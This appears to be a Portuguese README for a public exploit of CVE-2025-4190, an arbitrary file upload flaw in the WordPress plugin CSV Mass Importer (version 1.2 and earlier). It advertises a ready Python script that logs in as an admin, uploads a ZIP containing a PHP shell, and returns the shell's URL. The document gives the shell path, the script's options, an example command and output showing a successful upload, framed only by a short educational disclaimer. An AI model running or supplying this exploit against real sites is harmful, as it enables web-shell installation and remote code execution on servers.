
CSV Mass Importer <= 1.2 - Admin+ Upload Arbitrário de Arquivos
O plugin CSV Mass Importer (≤ 1.2) para WordPress contém uma vulnerabilidade de Upload Arbitrário de Arquivos por Admin+.
Devido à validação inadequada dos arquivos enviados, usuários com altos privilégios (como administradores) podem enviar arquivos arbitrários no servidor, mesmo quando isso deveria ser restrito — por exemplo, em configurações de multisite.
Esta vulnerabilidade permite que um invasor envie shells PHP ou arquivos maliciosos, levando à execução remota de código (RCE) no servidor.
Descoberto por Nxploited (Khaled Alenazi).
O plugin não verifica corretamente os arquivos enviados ao usar o recurso de importação CSV.
Um arquivo ZIP manipulado contendo um shell PHP pode ser enviado e extraído para um diretório acessível publicamente.
Exemplo de Caminho do Shell:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
Este repositório contém um script de exploit Python pronto: 4190.py
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
Este código é fornecido apenas para fins educacionais.
O autor não é responsável por qualquer uso indevido ou dano causado por este script.
Use com responsabilidade e apenas em sistemas que você está autorizado a testar.
Descoberto e desenvolvido por Khaled Alenazi (Nxploited) 🌟